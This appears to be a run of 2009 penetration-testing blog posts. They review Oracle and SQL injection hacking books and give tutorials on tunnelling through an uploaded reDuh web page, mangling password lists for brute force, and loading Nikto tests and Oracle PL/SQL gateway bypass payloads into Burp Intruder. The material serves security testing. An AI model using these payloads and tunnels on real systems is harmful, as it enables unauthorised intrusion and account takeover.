In general I have nothing but positive things to say about the book. However I do wish there was more "new" material for Oracle as most of the discussion on Oracle can be found on the author's blog and presentations. Unfortunately the majority of the things I was unclear about before reading the book, I'm still unclear about because its the same material. My biggest gripe comes from the Oracle privilege escalation section of Chapter 4 where its says "Privilege escalation via Web Application SQL injection is Oracle is quite difficult because most approaches for privilege escalation attacks require PL/SQL injection, which is less common." But never gives an example of how to do PL/SQL injection via the web application. Uncommon != never. Unfortunately for most penetration testers access the TNS listener is usually firewalled off and exploitation Oracle through the web application is exactly whats required. Not covering that vector is really a downer. I'm not an expert in any of the databases so maybe the problem applies to other databases in the book but i didn't notice it in my reading.

There was also a lack of discussion on DB2 or Postgress but there is some material in the Cheat-Sheets section for those databases.

On a more positive note, the coverage of the three core databases (MSSQL, MySQL, ORACLE) is excellent (with the exception of the above comments) and there are two really good chapters on defense (CH8 Code-Level Defenses & CH9 Platform-Level Defenses). Its a must have if you are getting into web application testing.

CG

Annaliza Savage - Unauthorized Access (documentary)


Someone posted a link to this on Twitter, its a good old school documentary and worth the watch.


CG

Sunday, October 18, 2009

Oracle Hacker's Handbook Book Review


The Oracle Hacker's Handbook Book Review

by David Litchfield

4 Stars

Required Reading for Breaking into Oracle Databases

I've been doing some Oracle research and of course this is the only book on the market that really covers breaking into Oracle with the exception of The Database Hacker's Handbook which came out in 2005. Justin Clark's (and others) SQL Injection Book published in 2009 also covers some Oracle material but not enough to make this book obsolete.

I bought this book immediately when it came out in 2007 (yeah I'm super late on the review) but frankly put it down because it was confusing and definitely not suited for anyone that didn't already have a basic exposure to Oracle. I picked it up again in late 2008 after doing the background research on Oracle security and administration. Armed with a better understanding of Oracle in general I attacked the book again, focusing on SQL Injection in the Oracle PL/SQL packages with the goal of going from locating an open TNS listener to getting a shell on the system.

The author is well known in the security industry and one of only a handful of Oracle Security "experts", so the skill level was definitely there.

Breakdown of the Chapters:
Introduction.
Chapter 1 Overview of the Oracle RDBMS.
Chapter 2 The Oracle Network Architecture.
Chapter 3 Attacking the TNS Listener and Dispatchers.
Chapter 4 Attacking the Authentication Process.
Chapter 5 Oracle and PL/SQL.
Chapter 6 Triggers.
Chapter 7 Indirect Privilege Escalation.
Chapter 8 Defeating Virtual Private Databases.
Chapter 9 Attacking Oracle PL/SQL Web Applications.
Chapter 10 Running Operating System Commands.
Chapter 11 Accessing the File System.
Chapter 12 Accessing the Network.
Appendix A Default Usernames and Passwords.

I think most of the background chapters are "adequate" and the exploitation chapters are very good. At the time of publishing the author released code for vulnerabilities that were brand new. I do have issues with Chapter 5 Oracle and PL/SQL. I think the coverage of PL/SQL is only adequate if you already know PL/SQL. It took me going and reading a lot of other material on the net about PL/SQL to understand things that are glossed over in the chapter. The chapter is good and covers tons of material but from an attacking Oracle perspective more time should have been spent on teaching the reading how to use the "describe" package option in PL/SQL to describe the package to learn how to craft your queries correctly as well as how to research and write your own SQL Injection queries based on published vulnerabilities. More coverage on default privileges and roles would have been useful as well. Again, if you have been an Oracle DBA, you understand this already. If you are an Oracle security researchers you know this already. If you are a pentester trying to get some Oracle under your belt you'll have to go pick up another book or hit the internet to get the background material.

The other chapters are good and they cover their stated topics. More examples would have been nice of course. A couple of times we are told to check out the Oracle coverage in The Database Hacker's Handbook. That's just frustrating. While I'm not a huge fan of republishing materials, if information is needed to understand or better understand a topic then include it, its not like OHH was "running long" its very slim for a security book.

What knocked the book down to 4 stars was when I went and read the Oracle sections of The Database Hacker's Handbook and it had material that wasn't included in OHH. Given the "slimness" of the book, it wouldn't have hurt the book to reproduce the content from DHH as it is relevant and helps explain the concepts better than the coverage in OHH.


source code download location
http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470080221,descCd-DOWNLOAD.html


CG

Thursday, October 15, 2009

More On Using Sensepost's reDuh


(mirrored from carnal0wnage.attackresearch.com)

A bit more on sensepost's reDuh

sensepost page on it: http://www.sensepost.com/research/reDuh/

reDuh comes with a reDuh.jsp, aspx, and php pages. work you magic to upload the page to the remote server. once its there you can connect to it with the reDuh Client

yomama@c0:~/pentest/webapp/reduh/reDuhClient$ sudo java -jar reDuhClient.jar http://172.16.82.144/CFIDE/reDuh.jsp
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from 172.16.82.144:80/CFIDE/reDuh.jsp. Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010

Once you are connected to the remote end, in another terminal connect to your local reDuh instance.

yomama@c0:~$ nc localhost 1010
Welcome to the reDuh command line
>>[usage]
Commands are of the form [command]{options}

Available commands:
[usage] - This menu
[createTunnel]::
[killReDuh] - terminates remote JSP process, and ends this client program
[DEBUG]<0|1|2> - Sets the verbosity

>>[createTunnel]4567:172.16.82.144:3389
Successfully bound locally to port 4567. Awaiting connections.

In your other shell you should see something similar to this:

[Info]Caught new service connection on local port 1010
[Info]Successfully bound locally to port 4567. Awaiting connections.

Fire up your terminal server client and point it at localhost:4567

[Info]Requesting reDuh to create socket to 172.16.82.144:3389
[Info]Successfully created socket 4567:172.16.82.144:3389:1
[Info]Localhost ====> 172.16.82.144:3389:1 (34 bytes read from local socket)
[Info]Caught data with sequenceNumber 0
[Info]Localhost <==== 172.16.82.144:3389:1 (11 bytes picked up from remote port) [Info]Localhost ====> 172.16.82.144:3389:1 (386 bytes read from local socket)
[Info]Caught data with sequenceNumber 1

If all is working you'll see a shitload of http traffic and eventually your RDP prompt.


CG

Sunday, October 11, 2009

Creating wordlists with JTR


(mirrored from carnal0wnage.attackresearch.com)

Nothing new, probably covered else where but useful to revisit (maybe)...at least for my notes.

We had to try to bruteforce the ColdFusion admin password on a past pentest (more on that in another post--still testing the new MSF ColdfFusion modules). After trying my popular passwords (short) list I came nil so decided to use some words from the site we were trying to break into and use john to mangle the list up for some additional passwords to try.

you start with you initial list of words (you can also use CeWL http://www.digininja.org/projects/cewl.php to generate a site specific wordlist for you)

you then throw them into John and have the rules file mangle them.

yomoma@c0:~/pentest/john/run$ ./john --wordlist=/tmp/passwords-startwith.lst --rules --stdout | ./unique /tmp.passwords-mangled.lst

started with:

blah
carnal
0wnage
carnal0wnage
carnalownage

ended up with 159 words (it dropped the carnal0wnage after the upcase, not sure why) based on the default word mangling rules with john (that may or may not be that useful to you).

that's where JTR Config Maker from http://reusablesec.googlepages.com/jtrconfiggenerator can come in handy.

specifically " -Option (3) allows you to create word mangling rules. For example, add two numbers to the end of the dictionary word, and replace ‘a’ with an ‘@’."

so i F'ed with it for awhile and came up with a pretty good list i thought that was better than the default rules. You can pretty much set any type of mangle rule you want, save the rules file and even export out your john.conf to use so you can generate your password list like above.

If people are interested in more detail on this process let me know via comments.

CG

Saturday, October 10, 2009

Update to October 9th BToD


Hey folks, @mubix informed me that he has made a change to the DB export of Nikto. If you would like to see the improved command for extraction of the Nikto db_tests for use with Intruder please visit his site at Room362 .
cktricky

Friday, October 9, 2009

BToD Importing Nikto DB to Intruder > Courtesy of @mubix


Its Friday, oh how we love Friday. Anyways, courtesy of @mubix we have a command to export the Nikto DB into a format suitable for Intruder. If you have any questions about how to load into intruder reference the other posts. I take no credit for this, @mubix came up with this command.

So in BackTrack3 you can use the command

cat /pentest/web/nikto/plugins/db_tests | awk -F "," '{print $4}' | sed 's/^\"*//;s/\"$//' | sed 's/^\@CGIDIRS//;s/\@ADMIN//;s/^\@NUKE//;s/^\@POSTNUKE//;s/^\@PHPMYADMIN//' | sed 's/^\///' > ~/nikto_burp.txt

or in BackTrack4

cat /var/lib/nikto/plugins/db_tests | awk -F "," '{print $4}' | sed 's/^\"*//;s/\"$//' | sed 's/^\@CGIDIRS//;s/\@ADMIN//;s/^\@NUKE//;s/^\@POSTNUKE//;s/^\@PHPMYADMIN//' | sed 's/^\///' > ~/nikto_burp.txt

Like so.........


and this will export the contents of the nikto db_tests into a txt file and in the format Intruder prefers.

Should look like.......



There you have it. Make sure you show @mubix some love by visiting his site Room362 and remember that PortSwigger just released Burp Suite Pro v2.17 which has an xml export for the scanner findings suitable for Dradis import.

Happy Hacking! 
cktricky

Saturday, September 26, 2009

BToD Permanently modifying your Burp Suite payload strings.


Last week I showed you a couple of Oracle payloads you could load up into the intruder preset payload list Here. I'm sure at least one person thought to themselves, instead of loading the list from a file and keeping track of various files can't we just add this to our fuzzing list permanently? The answer is yes and we will walk thru it together.

The first thing we need to do is unzip our burpsuite jar file.I'm using 7zip which you can obtain here.



We now have a newly created folder containing the files that make up burpsuite.



Open the newly created folder and navigate to \burp\PayloadStrings\ and open the file you would like to edit. In our case, this file is 'fuzzing - full.pay'. I am using SciTe to edit the file but you can also use something like notepad++.




So go ahead and make your changes, I've added the Oracle payloads as mentioned before.



Save the file and exit. Zip the the contents of the folder as a JAR file like so:



Okay, well I moved this jar file back into the "C:\burpsuite_v1.2_pro\" directory and deleted the "C:\burpsuite_v1.2pro\burpsuite_pro_v1.2.16\" folder.

Now lets start it up and check to see if it worked.



Yep, it worked alright. Okay, so if you have any questions feel free to ask.

Happy Hacking!

~cktricky
cktricky

Thursday, September 24, 2009

BToD > Intruder & Probing for Oracle's OWA_UTIL stored procedure


Today I am just giving a cheat sheet for loading into Burp via the Intruder > Preset List Payload Set. This list contains known Oracle owa_util.cellsprint bypasses (minus the first one). This way you can detect whether or not you have a vulnerable stored procedure. Probably not a good idea to have the PL/SQL gateway out in the open but if it is now you can detect whether or not its easily exploited.

The preset list contains:

owa_util.cellsprint?p_thequery=select+1+from+dual
%0Aowa_util.cellsprint?p_thequery=select+1+from+dual
S%FFS.owa_util.cellsprint?p_thequery=select+1+from+dual
*SYS*.owa_util.cellsprint?p_thequery=select+1+from+dual
<<"LBL">>owa_util.cellsprint?p_thequery=select+1+from+dual

NOTE: STRIP THE QUOTATION MARKS OUT FROM ENCLOSING LBL SO IT IS ONLY LBL. I just had to enclose them to bypass blogspot's filter.


So create a notepad file containing this list. Send request for http://server.example.com/pls/dad/vulnerable_procedure into Intruder.

Navigate to Intruder > Positions and add position markers around vulnerable_procedure like so:




Navigate to > Payload Preset List and click 'load':




 Open the oracle payload file:





Then start!




If you have a 403 response you know you won't be able to access this. Otherwise, game on.


Happy Hacking!
cktricky

Wednesday, September 23, 2009

BToD > Intruder & Brute Forcer to view all potential values with responses


Previously, we had discussed using Intruder to brute force authentication by utilizing the Intruder's 'preset list' payload set. Now we will discuss using the ACTUAL Intruder brute force payload.

Now of course we are all aware of what comes to mind when you say "Brute Force" but what about another use? What if crappy entropy produces a value that is say AJJDAJJDASDFHGHABC but only the last three characters "ABC" change? This could be a session value and could be attacked as discussed in Sequencer & Entropy  OR it could be value such as 'resource=' which renders sensitive content. Your profile and the resource it can access might be client-side controllable and it may be as simple as iterating thru all possible combinations of that value.

In our scenario we will say that our sequencer has informed us of the weak entropy and those last three characters iterate between different combinations of ABCDEF (but not the rest of the alphabet) and only use upper case characters.

By now I assume you know how to load a payload or 'request' into Intruder. If not, reference any of the other BToDs for clarification. Navigate to Burp > Intruder > Positions Tab. Add position points around 'ABC' since this is what we will be iterating thru and collecting the responses.

Should look like this:




Next, navigate to Intruder > Payloads. Drop down the payload set list and choose 'brute forcer'.




In the picture below I show what the default settings are and the 4 settings we care about. Remember we know we will only use the characters ABCDEF, they will only be three characters and finally they will always be uppercase.



Character set - only include the characters we are interested in, the min and max length is 3 and case is Uppercase. Should look like this:



We are all set. Now start attacking............




Use the results to check for byte length (if attacking a session) or save the responses to prove to your customer you can view data that you should not be able to. Either way, enjoy.

Happy Hacking!

cktricky